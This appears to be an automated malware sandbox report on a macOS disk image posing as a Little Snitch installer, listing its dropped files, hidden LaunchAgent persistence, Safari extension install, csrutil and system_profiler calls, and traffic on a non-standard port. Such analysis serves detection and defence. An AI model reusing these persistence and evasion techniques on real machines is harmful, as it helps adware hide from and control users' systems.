Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.c!pend
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-copy-obje
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-memory-go
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/mutexes.cw
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-internal
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/runtime/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/mempool-in
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/glib.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-os-mutex
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/atomic.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/mini.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-membar.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-logger-i
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-tls.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-os-semap
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-coop-mut
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-coop-sem
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-threads.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-time.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/mini/../../../mono-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/object-off
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-linked-l
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/metadata-i
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/handle.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gc.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-descripto
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/sgen-clien
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-cardtable
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/metadata/threadpool
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-complex.
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-array-lis
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-gray.h
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-marksweep
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-protocol-
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-minor-cop
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/sgen/sgen-minor-sca
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/io-layer/wapi-priva
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/mono/utils/mono-hwcap-va
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/
Source: initial sampleString containing user path: /Users/builder/data/lanes/3985/35d1ccd0/source/xamarin-macios/external/mono/eglib/src/sort.frag.h
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /usr/bin/xattr (PID: 674)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 678)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/xattr (PID: 693)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/ditto (PID: 673)XML plist file created: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAwJump to dropped file
Source: /usr/bin/ditto (PID: 673)Binary plist file created: /private/tmp/macsearch.app/Contents/Resources/Base.lproj/.BC.T_g27T4pJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)XML plist file created: /private/tmp/tapufind/.dat.nosync02b9.IwDBz8Jump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58Jump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)XML plist file created: /private/tmp/tapufind/.dat.nosync02b9.sOJfNrJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70jJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Binary plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Extensions.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)XML plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Info.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)XML plist file created: /Users/henry/Library/Caches/com.apple.Safari/Extensions/TapuFind.safariextension/Settings.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j -> /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58 -> /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent created file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58 -> /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent created file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70j -> /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies or sets the kMDItemWhereFroms meta data storing the files originShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Xattr command executed: /usr/bin/xattr xattr -w com.apple.metadata:kMDItemWhereFroms \<\!DOCTYPE\ plist\ PUBLIC\ \'-//Apple//DTD\ PLIST\ 1.0//EN\'\ \'http://www.apple.com/DTDs/PropertyList-1.0.dtd\'\>\<plist\ version=\'1.0\'\>\<array\>\<string\>http://reiteration-a.akamaihd.net/INSREZBHAZUIKGLAASDZFAHUYDWNBYTRWMFSOGZQNJYCAP/FlashPlayer.dmg?S2SURL=\</string\>\</array\>\</plist\> ~/Library/X2441139MAC/Temp/player.dmgJump to behavior
Creates hidden Mach-O filesShow sources
Source: /usr/bin/ditto (PID: 673)Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5ObJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.o9GXrLJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.raddFFJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden Mach-O file written: Mach-O 64 bit: /private/tmp/tapufind/.dat.nosync02b9.DAOwrTJump to dropped file
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 10000
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 49286

Malware Analysis System Evasion:

barindex
An application crashed which may indicate that the sample tries to avoid analysisShow sources
Source: /usr/libexec/xpcproxy (PID: 724)ReportCrash process spawned: /System/Library/CoreServices/ReportCrash agentJump to behavior
Reads the sysctl hardware model value (may be used for detecting VM presence)Show sources
Source: /usr/sbin/system_profiler (PID: 659)Sysctl read request: hw.model (6.2)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 661)Sysctl read request: hw.model (6.2)Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configurationShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Csrutil executable: /usr/bin/csrutil -> /usr/bin/csrutil statusJump to behavior
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Reads hardware related sysctl valuesShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl read request: hw.ncpu (6.3)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 659)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 659)Sysctl read request: hw.memsize (6.24)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 661)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
Source: /usr/sbin/system_profiler (PID: 661)Sysctl read request: hw.memsize (6.24)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /tmp/tapufind/ChromeAndFirefoxSetter (PID: 716)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 701)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 710)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 678)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 693)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 701)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 710)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 722)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information:

barindex
Executes the "system_profiler" command used to collect detailed system hardware and software informationShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
Source: /usr/sbin/system_profiler (PID: 658)System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
Source: /usr/sbin/system_profiler (PID: 660)System_profiler executable: /usr/sbin/system_profiler -> /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
Lists all applications within the /Applications directoryShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Ls command executed: /bin/ls /ApplicationsJump to behavior


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 69635 Sample: setup.dmg Startdate: 14/02/2019 Architecture: MAC Score: 88 69 34.225.153.59, 10000, 49283, 49284 AMAZON-AES-AmazoncomIncUS United States 2->69 71 www.rached.space 2->71 73 58 other IPs or domains 2->73 75 Found C&C like URL pattern 2->75 77 Uses known network protocols on non-standard ports 2->77 9 xpcproxy Installer 9 2->9         started        13 xpcproxy Safari 14 2->13         started        15 xpcproxy tapufind 2 2->15         started        17 4 other processes 2->17 signatures3 79 Detected TCP or UDP traffic on non-standard ports 69->79 process4 file5 63 /Users/henry/Libra...gggkfl1b0pp5pt5sadh, bzip2 9->63 dropped 65 /Users/henry/Libra...1139MAC/Temp/mcwnet, VAX 9->65 dropped 67 /Users/henry/Library/X2441139MAC/Temp/chs, ISO 9->67 dropped 89 Modifies or sets the kMDItemWhereFroms meta data storing the files origin 9->89 91 Executes the "system_profiler" command used to collect detailed system hardware and software information 9->91 93 Lists all applications within the /Applications directory 9->93 95 Attaches disk images with shell command 'hdiutil' 9->95 19 macsearch 9 9->19         started        23 ditto 4 9->23         started        25 system_profiler 9->25         started        27 12 other processes 9->27 97 Installs Safari extensions 13->97 signatures6 process7 file8 53 /private/tmp/tapuf...t.nosync02b9.raddFF, Mach-O 19->53 dropped 55 /private/tmp/tapuf...t.nosync02b9.o9GXrL, Mach-O 19->55 dropped 57 /private/tmp/tapuf...t.nosync02b9.DAOwrT, Mach-O 19->57 dropped 59 /Users/henry/Libra...port/Agent/tapufind, Mach-O 19->59 dropped 81 Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration 19->81 83 Creates hidden Mach-O files 19->83 85 Writes Mach-O files to untypical directories 19->85 29 sh open 19->29         started        31 sh open 19->31         started        33 ChromeAndFirefoxSetter 19->33         started        45 7 other processes 19->45 61 /private/tmp/macse.../MacOS/.BC.T_5fp5Ob, Mach-O 23->61 dropped 87 Executes the "system_profiler" command used to collect detailed system hardware and software information 25->87 35 system_profiler 25->35         started        37 diskimages-helper 27->37         started        39 diskimages-helper 27->39         started        41 diskimages-helper 27->41         started        43 system_profiler 27->43         started        signatures9 process10 process11 47 diskimages-helper 37->47         started        49 diskimages-helper 39->49         started        51 diskimages-helper 41->51         started       

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.